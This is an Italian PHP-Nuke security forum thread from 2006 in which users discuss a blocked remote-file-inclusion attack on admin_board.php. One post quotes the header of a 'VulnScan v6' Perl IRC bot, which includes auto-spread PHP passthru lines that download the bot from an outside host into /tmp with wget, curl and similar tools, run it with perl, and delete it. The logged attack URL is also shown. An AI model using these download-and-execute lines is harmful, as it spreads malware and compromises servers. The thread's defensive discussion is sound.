. ::  Rilasciato Content Plus 2.2.1  ::  Nuke Debuggeer  ::  Backup_Restore Utility  ::  AV Home Articles V.1.0  ::  Modulo Video 2.0 ::.
Benvenuto su PHP-Nukefordonkeys.com Donkeys76 Mercatino 1200Temi Manuale
 
Benvenuto su PHP-Nukefordonkeys.com

  Iscriviti! E' Gratis!                                                                                                   
La Tua WebAgency


Menu Generale
Home
News
Mappa del Sito
Recensioni
Trova Tutto
Utenti
Forums
Downloads
Contatti
Promo Tuo Sito
Tutorials
Speciali
Manuali
PHPNuke Tools
Utility
Gallerie
Nuke Shopping
Documenti

Recensioni Siti
·MemHT.com
·Corvoingordo.com

**************
·Prestiti Mutuo
·Ricette cucina Gratis
·Dieta personalizzata
·Gioca Gratis Online
·casino online
·Sfrutta meglio il web
·Guida casino online
·Prestito auto

Consigliati



PHP-Nukefordonkeys.com: Forums

Phpnukefordonkeys.com :: Leggi il Topic - Attacco hacker per fortuna sventato.
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

Attacco hacker per fortuna sventato.

 
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza PHP-Nuke
Precedente :: Successivo  
Autore Messaggio
cuat
Newbie
Newbie


Registrato: Nov 02, 2005
Messaggi: 144
MessaggioInviato: 05-12-2006 01:46    Oggetto: Attacco hacker per fortuna sventato. Rispondi citando
Sentinel ha bloccato quasto ip:
Citazione:

IP bloccato: 82.165.177.145
ID Utente: Anonimo (1)
Motivo: Abuse-Filter
--------------------
User-Agent: libwww-perl/5.79
Query string: www.miosito.org/web/modules/Forums/admin/admin_board.php?PHPBB_ROOT_PATH=HTTP://WWW.SOHBETALEVI.COM/LOL1.TXT?
Stringa GET: www.miosito.org/web/modules/Forums/admin/admin_board.php?PHPBB_ROOT_PATH=HTTP://WWW.SOHBETALEVI.COM/LOL1.TXT?
Stringa POST: www.miosito.org/web/modules/Forums/admin/admin_board.php
Rinviato per: none
IP del client: none
Indirizzo remoto: 82.165.177.145
Porta remota: 36867
Metodo Richiesta: GET


sona andato sul sito:
WWW.SOHBETALEVI.COM/
è un sito turco che devo fare?
Torna in cima
Profilo Messaggio privato
rino
Amministratore
Amministratore


Registrato: Sep 28, 2004
Messaggi: 4617
Località: Anzio
MessaggioInviato: 05-12-2006 03:18    Oggetto: Rispondi citando
Non puoi fare niente anche perchè non è detto che siano stati loro ad attaccarti. Quello che è certo è che l'attacco è partito dal loro sito ma non è detto che loro sappiano che hanno quel file nel server. In parole povere questo tipo di attacco funziona così:
io deposito un file, di solito .txt sul tuo sito , per es. lo metto nei download oppure direttamente sul server se riesco ad accedervi.
Dentro quel file c'è lo script di attacco.
Poi preparo un url che richiama il tuo sito/ il file ed attacco qualsiasi sito. Chi riceve l'attacco vede che l'attacco proviene dal tuo sito ma tu, in effetti, non ne sai assolutamente nulla.
Pertanto vai sul sito turco e ,se hanno un feedback, informali che hai ricevuto l'attacco e vedi cosa rispondono.

Torna in cima
Profilo Messaggio privato Invia email HomePage
cuat
Newbie
Newbie


Registrato: Nov 02, 2005
Messaggi: 144
MessaggioInviato: 06-12-2006 16:49    Oggetto: Rispondi citando
Ieri sera hanno riprovato la stringa di attacco è sempre la stessa.
Come faccio a sapere il nome del server su cui si trova il sito.
Torna in cima
Profilo Messaggio privato
rc1351
Newbie
Newbie


Registrato: Jun 24, 2006
Messaggi: 175
MessaggioInviato: 06-12-2006 17:31    Oggetto: Rispondi citando
informazioni di Robco che ho interpellato

Codice:

# VulnScan v6 Stable By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
# www.priv8.com.ar
#
#
# Greets to irc.gigachat.net :: #Morgan
#
#
# To work with auto-spread :
# Create a file named spread.txt with this :
#
# <?
# passthru('cd /tmp;wget http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;curl -O http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;lwp-download http://priv8.com.ar/v6;perl v6.txt;rm -f v6*');
# passthru('cd /tmp;lynx -source http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;fetch http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;GET http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# ?>
#
# Change the http://priv8.com.ar/v6 .. put ur bot url in that file
# then use the command :
#
# !morgan !eval @cmdstring='http://yoursite.com/spread.txt';
#
# or directly change it from the code..
#
# Mirc Scripting Addon for scan :
#
# http://tckct.co.uk/remote.txt
#
# Enjoy the bot ....
# /Morgan




questi i siti e nome di chi ha generato il file depositato sul server www.sohbetalevi.com , come avrai visto lo lanciano richiamando admin.php.
ergo (sempre suggerimento di Robco) rinominare file admin.php, inserire un sistema antihacking tipo il suo (non entri nel suo admin, almeno per ora , neanche se piangi in cinese), provate nel suo sito Very Happy Wink
Torna in cima
Profilo Messaggio privato
cuat
Newbie
Newbie


Registrato: Nov 02, 2005
Messaggi: 144
MessaggioInviato: 06-12-2006 18:16    Oggetto: Rispondi citando
il file admin.php l'ho rinominato sin da quando ho installato il sito poi credo di essere al sicuro perchè oltre alle varie patch ho il sentinel e hack alert plus installati.
Da me invece cercano di attaccare utilizzando il file admin_board.php
e se io lo rinomino?
Non li frego?
Solo che è un casino andare a cercare nei file del forums tutti quelli che richiamano il file admin_board.php
Torna in cima
Profilo Messaggio privato
rc1351
Newbie
Newbie


Registrato: Jun 24, 2006
Messaggi: 175
MessaggioInviato: 06-12-2006 19:04    Oggetto: Rispondi citando
http://www.robcoscript.com/Web/Sections-op-viewarticle-artid-8.html
Torna in cima
Profilo Messaggio privato
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza PHP-Nuke Tutti i fusi orari sono GMT + 2 ore
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum



Powered by phpBB © 2001 - 2007 phpBB Group
Forums ©


Phoenix Landscaping - Credit Counseling - Internet Marketing - Loans
Siti consigliati: Weblord - Tiempolibresite - jugo- pcprimipassi - aliek - tweakness - Script e Manuali - net-free - Manuali - HardwareMax - Web Promotion - Directory - Tuttosoft.it - GBComputer - Computerxtreme
Network: PHP Nuke Maximus - 1 Million Free Games - 1 Million Nuke Pixel - Corvoingordo - Ingegneria Gestionale - Torre del Greco

Generazione pagina: 0.38 Secondi